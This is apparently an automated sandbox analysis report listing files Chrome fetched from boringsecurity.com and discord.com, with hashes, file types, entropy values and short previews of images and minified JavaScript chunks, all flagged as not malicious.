                                                                          SHA-512:C19227A0A946CB648DAF8A26241DEF665432AA5AE5F39DDC19A604E56ADD92A7C36EE0E3F58D41A840F9DC9A4E86E2CF7BC786F67DE9546592B1C516330766BF
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.PNG........IHDR................M....pHYs............... .IDATx...X.Y....1....].....DD@.)....ETPQ1Q...n]..U.tu.5Vb...|..}...u......]..s=.3<.<.g.w.s.A.......r.g<~=/.....J3..)*G.5....A.;..c..............~j....V.s!..h..c...O.A.....\s..f....V..S=.i.-..3.,.P..L..gBV9*.A..v....E2.......o..d<~3.+.3!........'.rT^......X".H.-d<~=W@v..2.......0.7.A.{.J...'...(@P.X.l..Vy.._..e.U%j.........6......W....Ju....J.*!.}..R.*.Mx.7...U....o4*...7...hT.W.n..........Q.\.....F....p....F%p..&<...J.*.Mx.7......Qw..N..O.Y.."..Dc<-b.|....~.X....+.s..J.>....@y.T12_...F....;..mE... ..!.....y...B`{1..S".Tu~.s>.....V8j...L..........Z.6<|[...]Y...%~..2..Y.^.......`3.-...R...b.ui.^...s....^,Y~.4..P..F..E.......r..V...+.,.z.h.F.M'..VH...O..EgnJ}....$.m..D.n....s.......W&,..U+....YFj*.NOCNF:.JOci.7.u..<!A..pa..h.../P.2?N.f.(...u...."..Y/%..=-.....8x...u...p...9o..<n...yh.Q.cT.h....y..t^...%.....{..q..A.?q.g..s.p..y\.x..._..k...7q......?...{..W<x..?..#...3.`9..lQ|..mnP.St.0 g
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 64 x 64, 8-bit colormap, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):2421
                                                                          Entropy (8bit):7.8528504199126665
                                                                          Encrypted:false
                                                                          SSDEEP:48:qnVxvxeRr/6r6ywmE810X8s3xz+PRImGOTVO0V5nOGUhhdvHzwavVH8e6Rh:qnVxeSXrE8GX8s3x2ufOTVvnOGUVzcRh
                                                                          MD5:5452DE999C71539D4D43B4332F3605CE
                                                                          SHA1:CF7393BDB56F70B10A976F1A662812B2202092B5
                                                                          SHA-256:12C42DE4EE9917A52A2A9166A5BDA4E195F44A7E1A8F9F8D31CF197743BF1EC4
                                                                          SHA-512:83E7CBA481DF02ACFEA73EE75B85FB4A6258327C0C5E14A0A3C6712AA00CED3E3EF57F9BF8F1A9A43CF5C37126C5AAD56844392925CD8C4D849DACAA59D58437
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.PNG........IHDR...@...@.............PLTELiqTWU......[]\...SVV?CD7:;RSP...GLKVYYmsxDHHx........ntxW]a`eh.! #"#%#...'*)...$''*,-&'%TY[Y^aOSU^dgGKLJOQ....11cilCGH;?@puxinr......256v{~|..........................$.W.....tRNS.~.f-....UB..........sT....pHYs................RIDATx..W.v..UV*M.t...W..v.....w@...L..s..8.xqq..E.K{.p......._..=..~....C..../.o.......i..(e...._......O]PJ..l..j....&.....p.i...`..*I..j.3Z{.Ux.......m?...N...30!p.R..w..].......^.....TJ.)..T.x...I...6Dv.U.m.%.**...JN.KJyg..........FV.Q*3.I).DJ"..3..4...z.:w:.-.V.SEI...N..uUqZ.R......m.N.W..u....n.W~.+.:.......N?.........Y..X..K....!F...P......s..%'p..l.l{.f=.....h.z..R*Mp......y...V..X.Jt*..Ix.*.KF).....y...Y.n:. .!.K. DRL...h.f..Jk.1.>.......dUA.y.V.._K*)...U..5..u]....'q.ikO..o+^.-.Z.A.....m.0........@.^6W..0.R.G.._..a&..RR.?.!.........x....p.%.,....?@.UV.H...T(^y|.dm.".....Jr..D$L.`..,.Y{N2...91..].w......4.@.......0+e...B@,.....Bfg.s....y...M..&.T}..n.]...Z..@),.]..:
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (36676)
                                                                          Category:downloaded
                                                                          Size (bytes):37287
                                                                          Entropy (8bit):5.338524956153568
                                                                          Encrypted:false
                                                                          SSDEEP:768:9PW61AWWKFqyIf4miaEGvUujJi6y1OVbfWT8fR:iWWJyIfwarti6yMfWC
                                                                          MD5:FAF7F6249D54A59FA62BC999106FC363
                                                                          SHA1:6A48ACF5CA84266265E7EDB291C3515FE82C749C
                                                                          SHA-256:608CC703091253317FB1DA196062207FFF21FEB21470813EED4D0F58397DDF2F
                                                                          SHA-512:30C1F3CFAB689CE1097DD63E590C302A4555E0E7E66ED504CB0BBBF190D5B17C95357164E8F1CC8E31836F0887C378115DFB3550C251EF26D9D543FCC87D5D0C
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://boringsecurity.com/_next/static/chunks/940-c7b68c0e005aa30a.js
                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[940],{62125:function(e,t,i){i.d(t,{Ps:function(){return B}});var r,n,s,a,o,l=i(40513);let h=/\r\n|[\n\r]/g;function c(e,t){let i=0,r=1;for(let n of e.body.matchAll(h)){if("number"==typeof n.index||function(e,t){let i=Boolean(e);if(!i)throw Error(null!=t?t:"Unexpected invariant triggered.")}(!1),n.index>=t)break;i=n.index+n[0].length,r+=1}return{line:r,column:t+1-i}}function u(e,t){let i=e.locationOffset.column-1,r="".padStart(i)+e.body,n=t.line-1,s=e.locationOffset.line-1,a=t.line+s,o=1===t.line?i:0,l=t.column+o,h=`${e.name}:${a}:${l}.`,c=r.split(/\r\n|[\n\r]/g),u=c[n];if(u.length>120){let e=Math.floor(l/80),t=[];for(let e=0;e<u.length;e+=80)t.push(u.slice(e,e+80));return h+p([[`${a} |`,t[0]],...t.slice(1,e+1).map(e=>["|",e]),["|","^".padStart(l%80)],["|",t[e+1]]])}return h+p([[`${a-1} |`,c[n-1]],[`${a} |`,u],["|","^".padStart(l)],[`${a+1} |`,c[n+1]]])}function p(e){let t=e.filter(([e,t])=>void 0!==t),i=Math.max(...t
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (25868)
                                                                          Category:downloaded
                                                                          Size (bytes):27588
                                                                          Entropy (8bit):5.356063126699773
                                                                          Encrypted:false
                                                                          SSDEEP:384:ADHGMkCfMhlOPD5kxL9YNSLSmSy0PG8OOZ1oxEsoC7rfkHId6Qh4gXHU:Aq8UGD5kxZYNSLR6Gl3x/oC/4K4gk
                                                                          MD5:DA5DC944E9CB4E56F792BC3D7995A2A0
                                                                          SHA1:483B35A87A5BA243A14AEEFA14CD1BFA50566CA4
                                                                          SHA-256:7165A776B760C0A6A02926E3206877A20860487BBD3D650058B28B308AB853A1
                                                                          SHA-512:556E568D0B87B93059B0BBFBF34F0CC312788724462CC0DB8B695F815EE2BD5E36F1B50AC4416B4AA0FB054FF1FF6D5A7AD118E96671D183E520AB9FB0379B08
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://boringsecurity.com/_next/static/chunks/514-a4b28d509d8a38e7.js
                                                                          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[514],{19803:function(e,t){var n;/*!. Copyright (c) 2018 Jed Watson.. Licensed under the MIT License (MIT), see. http://jedwatson.github.io/classnames.*/!function(){"use strict";var r={}.hasOwnProperty;function o(){for(var e=[],t=0;t<arguments.length;t++){var n=arguments[t];if(n){var i=typeof n;if("string"===i||"number"===i)e.push(n);else if(Array.isArray(n)){if(n.length){var l=o.apply(null,n);l&&e.push(l)}}else if("object"===i){if(n.toString===Object.prototype.toString)for(var a in n)r.call(n,a)&&n[a]&&e.push(a);else e.push(n.toString())}}}return e.join(" ")}e.exports?(o.default=o,e.exports=o):void 0!==(n=(function(){return o}).apply(t,[]))&&(e.exports=n)}()},13110:function(e,t,n){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.getDomainLocale=function(e,t,r,o){{let i=n(8470).normalizeLocalePath,l=n(72077).detectDomainLocale,a=t||i(e,r).detectedLocale,u=l(o,void 0,a);if(u){let t="http".concat(u.http?"":"s","://
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (20884)
                                                                          Category:downloaded
                                                                          Size (bytes):20939
                                                                          Entropy (8bit):5.620462251990331
                                                                          Encrypted:false
                                                                          SSDEEP:384:pjeGawiDkHx0zKAke1K0SonXbtOWjaiPTLhk2rDZnOmDa27yj:pjeGawiyxbOjaCLqIK27yj
                                                                          MD5:E9D6A669C769984239C27CBA4AE7822F
                                                                          SHA1:278EED10041085D67B8F2136C13E87E2C3122154
                                                                          SHA-256:B1E64385AA4938AAC1304A1C949A5E819B379875330672FAD1FE6C7E3877A2EA
                                                                          SHA-512:29D96670B84DF71A97CDAD457EA34E526E0BA37645B4EBCE7E28AC0825B7696916DCAF84A8E1779AE7884FC474979C7AB8A7084770879A5B32CF53BE7E892A76
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/69039.0d3b4d5be7f6a21cf93d.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["69039"],{741148:function(e,t,n){"use strict";n.r(t),n.d(t,{focus:function(){return E},hidden:function(){return o},resized:function(){return a},fullscreenChange:function(){return s},init:function(){return _},unload:function(){return A}});var l=n("917351"),i=n("913144"),u=n("563680"),r=n("816454");function E(e,t){i.default.dispatch({type:"WINDOW_FOCUS",windowId:(0,r.getWindowId)(e),focused:t})}function o(e){i.default.dispatch({type:"WINDOW_HIDDEN",windowId:(0,r.getWindowId)(e)})}let d=(0,l.memoize)(e=>(0,l.debounce)((t,n)=>{i.default.dispatch({type:"WINDOW_RESIZED",windowId:e,width:t,height:n})},100));function a(e){let t=(0,r.getWindowId)(e),n=d(t);n(e.innerWidth,e.innerHeight)}function s(e){let t=(0,r.getWindowId)(e);i.default.dispatch({type:"WINDOW_FULLSCREEN_CHANGE",windowId:t,isElementFullscreen:(0,u.isFullScreen)(null,e.document)})}function _(e){let t=(0,r.getWindowId)(e),n=e.document;i.default.dispatch({type:"W
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (61038)
                                                                          Category:downloaded
                                                                          Size (bytes):61093
                                                                          Entropy (8bit):5.484319379296006
                                                                          Encrypted:false
                                                                          SSDEEP:1536:YmMgiIeD3BD2F7XN8L6v7wQnZs0BaomIIh:WgiIeDCNU6DwQGCgh
                                                                          MD5:B2244CDE810FCD895D18903E6635A0BA
                                                                          SHA1:0A62BD02F8AC09198FF95776C9B892A3ED69F5BF
                                                                          SHA-256:58E96D94711D857DE8F07B789D75B67BC0AA340AFC2B57A2435D09859D088436
                                                                          SHA-512:658ACDB5FAB706A7EE4AE71F8A337E87BC7A0CF94F6393DCCDF7D800C371064C285F354ADDBFF5D6C5C5B84F648C30B215E14D2D4BA02C8BF6A1BB9A8F32789B
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/31717.600d5111130648c4f7c5.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["31717"],{819689:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return eS}}),n("70102"),n("222007"),n("702976");var a=n("394846"),l=n("872717"),s=n("819855"),i=n("913144"),r=n("408062"),d=n("979911"),u=n("716241"),o=n("802493"),c=n("595525"),E=n("219788"),f=n("679653"),_=n("893694"),g=n("139514"),h=n("312016"),m=n("605250"),S=n("619443"),p=n("582415"),M=n("600798"),T=n("569808"),A=n("9294"),I=n("52393"),C=n("143291"),L=n("379534"),D=n("40566"),v=n("994918"),O=n("815297"),y=n("168730"),N=n("129953"),R=n("28007"),b=n("880731"),G=n("562228"),U=n("793277"),P=n("256572"),w=n("364685"),k=n("804888"),B=n("263024"),F=n("410912"),V=n("373469"),H=n("271938"),x=n("42203"),K=n("305961"),W=n("337543"),Y=n("377253"),j=n("957255"),X=n("824563"),J=n("660478"),q=n("27618"),z=n("18494"),Q=n("162771"),Z=n("401848"),$=n("697218"),ee=n("599110"),et=n("568734"),en=n("659632"),ea=n("701909"),el=n("719923"),es=n("299039"),ei
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (15207)
                                                                          Category:downloaded
                                                                          Size (bytes):15262
                                                                          Entropy (8bit):5.305189883889979
                                                                          Encrypted:false
                                                                          SSDEEP:384:WVtC0Yz18nmy67Ru6WRuiUJEpC/VsjWfpVQCyeX3CXUP/OcarjmL6518:gtC0+8nmy67Ru/RuiAEp8VsjWfppyeXt
                                                                          MD5:0D9115895C1F8DA2766C64E3FF23B8DF
                                                                          SHA1:66481BE445DD4603431D2BBF264D9DF7FB0360EC
                                                                          SHA-256:E4B7C9BDB6416B2C80B1E34A499DB8080640F5612E0F2908ACE43136CCDA1FB1
                                                                          SHA-512:4CA14B51530DEEAC13E6AABE55A66BFFC1A635C6A9A0603826ACF3703C39C08794C692442B128A47C870E5D63547EB85EB3CB717F40F5841E8324D01076A0926
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/61160.b9c554bf37895ed48683.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["61160"],{41092:function(e,t,n){var r,o;e=n.nmd(e),n("854508"),n("424973"),n("222007"),n("70102"),n("808653"),r=this,o=function(e,t){"use strict";function n(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.filter(function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable})),n.push.apply(n,r)}return n}function r(e){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{};t%2?n(Object(r),!0).forEach(function(t){i(e,t,r[t])}):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):n(Object(r)).forEach(function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(r,t))})}return e}function o(e){return(o="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol"
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 156 x 156, 8-bit/color RGB, non-interlaced
                                                                          Category:downloaded
                                                                          Size (bytes):19516
                                                                          Entropy (8bit):7.986272394584636
                                                                          Encrypted:false
                                                                          SSDEEP:384:EJQBj5xObbYJ0mlcU3qnYEDJpsOhpmjsL3WuBxTbXSOAKzmHGPhS6s:DNObiZzqYEcyIjsLvBxviOAfT6s
                                                                          MD5:DF655FB76694631D2E27F357FF9FF37B
                                                                          SHA1:57310FAB079F119E4DDF15FAAF7DF15D49FE10E0
                                                                          SHA-256:53D35F976F8B6B715C7F5057104D7C1EE96166860A560BDAE488CE69C95B5B1D
                                                                          SHA-512:4516CDC062F4B6FF21F88A13192BF98586366BB1278F1B497513EC8018928A5FBDDEFC92CC72B2C0A064C25CDFAAD4E466A0C750DC25BCB616A436C5EDC63D4E
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://boring-security-cms.s3.amazonaws.com/thumbnail_916389a9b9dff2fff021cf2a62264925_537b20d36d.png
                                                                          Preview:.PNG........IHDR...............U.....pHYs............... .IDATx..}.TT....C.@............[.....A....nAAT....af.....ED.....u.K..;.9........o...M..s..-.....r......6..@..........P._.'.........[.;..r..{...-.....S..9.....\..%.w..;E.....\.*.4.(.C.rKD...5..1...S...z./.5.y.3(qT.....Gh.=Pq@4.wO...i.+n=.j..Q......... .d....3...".t....6...9...Ms..9..)....p.......T.s...J0x.c.*.6v.....cgg.0.......w..5............A.=S.w:..D.Y.|2...-.w..3...\.....s4.H1=|K....a.......t8..|..J...7.v..-.*I"}h..* .B.(.d .d.KL.y`....U..7.<.7."o..U..S.._.e...#.4.Fw.nt...t.?.*....1....M..~..h.".....P.=..E.6x...w..M......0.....3..&..-[.=...]3E\RX`........}....S..9..y.}8..d8..[R.o....%..xp....8....nE.6(........l..6....>..C.Q....iNv6..VL.;r.......I...2j..q...6f..a.....XY.:\Jd..Q.&...D...b.....1..X.&.|..a<....c(....).l...C..>..X....I..XY...?C..V......T..........N>E?.J..U.K.O.Y4BX.<..,,........Js.B>.J..`.....'...h.....X.`3..pa.2R4...E.l.}....Tz.+..[.v....B,W.BW..w.*.{.~&..M3....l....0l..
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (28091)
                                                                          Category:downloaded
                                                                          Size (bytes):28146
                                                                          Entropy (8bit):5.445156413527851
                                                                          Encrypted:false
                                                                          SSDEEP:768:CI/Ovokw2QRI5id2FC/rDtgBdWzuQQt/8iAhwpS:CsuqrDtMgzzy/8iAhkS
                                                                          MD5:3C3526A5242B8EDBF4465C32AAF8FA93
                                                                          SHA1:577AABB70319DDB82FF368904993A42B33867D13
                                                                          SHA-256:56D5C52D9D7EE3AA25C7670D3A69B9D711C20ED56E61F26F21CB459640FBF3D2
                                                                          SHA-512:4ACE212AD39D2C4C7B5A856B711BE8765D3019C62F650BF57A58CDCAFD53EE08BA779BBB1EAAB09449EA8632BE62E4FFAD8D1480D1732D51FA8AB35F7606094D
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/74970.ad098636400bd7dcbe6c.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["74970"],{428958:function(e,t,l){"use strict";l.r(t),l.d(t,{default:function(){return y}});var s=l("884691"),u=l("714617"),i=l.n(u),n=l("995008"),r=l.n(n),a=l("759843"),o=l("913144"),h=l("42203"),d=l("18494"),c=l("162771"),p=l("599110"),_=l("716241"),f=l("939011");let R=(0,a.trackMaker)({analyticEventConfigs:p.AnalyticEventConfigs,dispatcher:o.default,TRACK_ACTION_NAME:"TRACK"});function y(e){let t=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{disableTrack:!1,trackOnInitialLoad:!1},l=arguments.length>2?arguments[2]:void 0,u=s.useRef(),n=s.useRef();s.useEffect(()=>{let s=!i(u.current,e);s&&(u.current=e);let o=!i(n.current,l);if(o&&(n.current=l),!s&&!o)return;let y={...e,sequenceId:r("impression_")};return!function(e){var t,l;let s=arguments.length>1&&void 0!==arguments[1]&&arguments[1],{name:u,type:i,properties:n}=e;if(e.type===a.ImpressionTypes.MODAL&&null==e.name&&(0,f.getImpressionStack)().some(e=>{var t
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, baseline, precision 8, 156x156, components 3
                                                                          Category:dropped
                                                                          Size (bytes):6407
                                                                          Entropy (8bit):7.928742760363145
                                                                          Encrypted:false
                                                                          SSDEEP:96:PXgL2fP1tIgFjlWE7ZmmwZdtllEMF3kRQ8xbVsZguB/qOaHpVC0CGbyJPW6jb6Fg:PQL2ltXaEtwZdtllj9osZh/M5lbygMD
                                                                          MD5:D0ECFB50FB55104676B5FF2A0A53B88C
                                                                          SHA1:1072AA722820A7C8865ED95726C82CBD61B5FC0E
                                                                          SHA-256:0BBEC1C42DD9376813221070F5475AF76CD985F75174958E3D106CFF048B4483
                                                                          SHA-512:E50EB075F5D87469DF93438BA5AF286814CFD6FF11BF15D60893D57D24AE2DE4B7B03F55519D04552298B19477DDDBC92A6B0FDBB9EF24F03EC43B47848E324B
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((..........."........................................<.........................!1.."AQaq....2...#BR...$..3Cb...................................".......................!1.A."a2Q............?....Q.....Z..9#..z.'......P......@...(....R,A!(].92)...0|...<~...Fx.qD.....V.....v....m=:W%......G..9.r..f.d7.....Q.(...@.....f....7...1,.p..p6...X......1..\......W""...:^.9Q...x..I..=*.....Ti...Jn...|sGVrb5......@.8<.......4.. .....Z{..e....J...x=s.>..5.g.x.HVA.K.n...jr).`...q#.#....yW.&.W-.@s[&...U.^.MC..s..X..G...X..t..or.D.,..q....p5..8.I.1...O..|qU&...QT..Q.U.WgF(@q.......ks.. U(u..._h|.t.....3..."mq.H....K....h....B...Fp..:.)h*......K. ..k..C.<T....3.h....{n.D.G..:T7v....p...A4A/........L......j..&.HdX..-.C4....>B..(....u..@.s\$`)....4M........:sU.>....F.r....L.g.\<m..tj.>!......mP28..].non.T7%UA%...Dd...o.6..A.-j5h.......q...5..}
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 156 x 156, 8-bit/color RGB, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):19516
                                                                          Entropy (8bit):7.986272394584636
                                                                          Encrypted:false
                                                                          SSDEEP:384:EJQBj5xObbYJ0mlcU3qnYEDJpsOhpmjsL3WuBxTbXSOAKzmHGPhS6s:DNObiZzqYEcyIjsLvBxviOAfT6s
                                                                          MD5:DF655FB76694631D2E27F357FF9FF37B
                                                                          SHA1:57310FAB079F119E4DDF15FAAF7DF15D49FE10E0
                                                                          SHA-256:53D35F976F8B6B715C7F5057104D7C1EE96166860A560BDAE488CE69C95B5B1D
                                                                          SHA-512:4516CDC062F4B6FF21F88A13192BF98586366BB1278F1B497513EC8018928A5FBDDEFC92CC72B2C0A064C25CDFAAD4E466A0C750DC25BCB616A436C5EDC63D4E
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.PNG........IHDR...............U.....pHYs............... .IDATx..}.TT....C.@............[.....A....nAAT....af.....ED.....u.K..;.9........o...M..s..-.....r......6..@..........P._.'.........[.;..r..{...-.....S..9.....\..%.w..;E.....\.*.4.(.C.rKD...5..1...S...z./.5.y.3(qT.....Gh.=Pq@4.wO...i.+n=.j..Q......... .d....3...".t....6...9...Ms..9..)....p.......T.s...J0x.c.*.6v.....cgg.0.......w..5............A.=S.w:..D.Y.|2...-.w..3...\.....s4.H1=|K....a.......t8..|..J...7.v..-.*I"}h..* .B.(.d .d.KL.y`....U..7.<.7."o..U..S.._.e...#.4.Fw.nt...t.?.*....1....M..~..h.".....P.=..E.6x...w..M......0.....3..&..-[.=...]3E\RX`........}....S..9..y.}8..d8..[R.o....%..xp....8....nE.6(........l..6....>..C.Q....iNv6..VL.;r.......I...2j..q...6f..a.....XY.:\Jd..Q.&...D...b.....1..X.&.|..a<....c(....).l...C..>..X....I..XY...?C..V......T..........N>E?.J..U.K.O.Y4BX.<..,,........Js.B>.J..`.....'...h.....X.`3..pa.2R4...E.l.}....Tz.+..[.v....B,W.BW..w.*.{.~&..M3....l....0l..
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (8424)
                                                                          Category:downloaded
                                                                          Size (bytes):8478
                                                                          Entropy (8bit):5.421582421960646
                                                                          Encrypted:false
                                                                          SSDEEP:192:4kCZH6zzC9T+M6IoSu8/gAEJpyCavUsAHUEqjxCHE+DU99:4kmayvS8YAOpyC1sXNic
                                                                          MD5:3739DD26278A6A2149A5A956EE334367
                                                                          SHA1:44D14091495B00F64C5A4B82EFCF2912E068A23E
                                                                          SHA-256:894F8E702CC1ED258B681930C7BBD67EBB41DAFE243A1B46766DAFE845A357A6
                                                                          SHA-512:0AB1D936403B6A7453315BD7382EBC1E6FEB7AC9A41AD3577DE8FB71B5476D174845C5EA75F226B600CF5E103CB0D490BD19D3B86AAE81CB5BE23F34EB69A31F
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/3341.1a1f8595a0c8fc9f99cf.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["3341"],{845658:function(t,e,r){"use strict";var n=r("125359"),o=String,i=TypeError;t.exports=function(t){if("object"==typeof t||n(t))return t;throw i("Can't set "+o(t)+" as a prototype")}},505713:function(t,e,r){"use strict";var n=r("174669"),o=r("148066"),i=r("541368").f,c=n("unscopables"),u=Array.prototype;void 0===u[c]&&i(u,c,{configurable:!0,value:o(null)}),t.exports=function(t){u[c][t]=!0}},109024:function(t,e,r){"use strict";var n=r("814026"),o=r("231814"),i=TypeError,c=Object.getOwnPropertyDescriptor,u=n&&!function(){if(void 0!==this)return!0;try{Object.defineProperty([],"length",{writable:!1}).length=1}catch(t){return t instanceof TypeError}}();t.exports=u?function(t,e){if(o(t)&&!c(t,"length").writable)throw i("Cannot set read only .length");return t.length=e}:function(t,e){return t.length=e}},746293:function(t,e,r){"use strict";var n=r("664144");t.exports=!n(function(){function t(){}return t.prototype.cons
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (28061), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):28061
                                                                          Entropy (8bit):5.421803069068823
                                                                          Encrypted:false
                                                                          SSDEEP:768:fArNNEOHmuDJZSRLEY6Wxc23SMkLV3Ssm:fiNVGqJZSRLf6Wxb3SMkJ3Ssm
                                                                          MD5:49D009970B13395FF503C0C5BD71CF60
                                                                          SHA1:92475406A01BE236F287F833A66D6E2AEFFA5608
                                                                          SHA-256:91F3560B5C364A896BC9A6BD05CD1427D41CA40B8B071534B93AEC38673E8A2A
                                                                          SHA-512:C736754A1732073643642B8B73C1EAB3B4383DA423BA58E9321753F589A41CE1D51AD2310CD1D6F2A679AD347FBAAB767BB8501D723E7096D90DC833130978E6
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://boringsecurity.com/_next/static/chunks/pages/index-91b2c5d3a0144c32.js
                                                                          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[405],{35774:function(e,t,a){(window.__NEXT_P=window.__NEXT_P||[]).push(["/",function(){return a(85592)}])},34357:function(e,t,a){"use strict";var l=a(79228),n=a(11527),s=a(40196),r=a.n(s),i=a(50959),o=a(62125),c=a(25187),d=a(37599),u=a(65282),x=a.n(u);function h(){let e=(0,l.Z)(["\n query GetAbout($locale: I18NLocaleCode) {\n about(locale: $locale) {\n data {\n attributes {\n title\n description\n locale\n }\n }\n }\n }\n"]);return h=function(){return e},e}let m=(0,o.Ps)(h()),p=e=>{var t;let{hideNav:a}=e,l=(0,d.useRouter)(),{data:s}=(0,c.a)(m,{variables:{locale:null!==(t=l.locale)&&void 0!==t?t:"en"}}),o=(0,i.useMemo)(()=>{var e;return null===(e=null==s?void 0:s.about.data)||void 0===e?void 0:e.attributes.description},[s]),u=(0,i.useMemo)(()=>{var e;return null===(e=null==s?void 0:s.about.data)||void 0===e?void 0:e.attributes.title},[s]);return(0,n.jsx)("div",{className:"
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):44
                                                                          Entropy (8bit):4.542055982805472
                                                                          Encrypted:false
                                                                          SSDEEP:3:Hn4kuWEfaUhyHoEj:JbGyIEj
                                                                          MD5:09EADE8173AE03D4335409B03BD5E30C
                                                                          SHA1:BF8C1BEEE6B0A0AE1CC76A76F75015A6269228CA
                                                                          SHA-256:998F8EC2F0356916A950833C54F4EA708BF8F12527D24B4C9842F4EAD0146B6A
                                                                          SHA-512:9361F6B4BD3C50AD52AACBCED53B8488B3F3133CB0E2C02E6941EB1F81DA54BEA560FF1AF8DEF179FC97D7AB8FF2A50B71B9D2127ABA412246C449EA38663AB7
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAn8ugAJ2JVishIFDYr40aASFwkGOKYgr7jJURIFDXuzs8wSBQ1KlmyV?alt=proto
                                                                          Preview:CgkKBw2K+NGgGgAKEgoHDXuzs8waAAoHDUqWbJUaAA==
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Unicode text, UTF-8 text, with very long lines (53967)
                                                                          Category:downloaded
                                                                          Size (bytes):59613
                                                                          Entropy (8bit):6.0931019703031986
                                                                          Encrypted:false
                                                                          SSDEEP:1536:hg+VEWrvLBPKEoLE/C9wcyaZ/KT6A9WrSqNbY0ylcPBC3TxIN9bKgkaspq7vOAJ+:C0zLhrpcPZiO7GWbmMIjyXGgZqC7eGTE
                                                                          MD5:0AE9345CDB92B36053B6BAAF119F92FC
                                                                          SHA1:E62399C96595E7208A518E82103D7250A3CF010B
                                                                          SHA-256:53DC4929DD523002F08741FC49928D153AF4E9269B80332D63988E51D921B9E9
                                                                          SHA-512:20F1EC0B21A45C39300C0B620E2971BF649D256FF9597BA3C1757A5DE1115ACBB4F32701A187926FBA41D17BA954C4734CE166984716AF12F9ECD7AB8E1B8F4A
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/55348.29e83ba0718684f2c9af.js
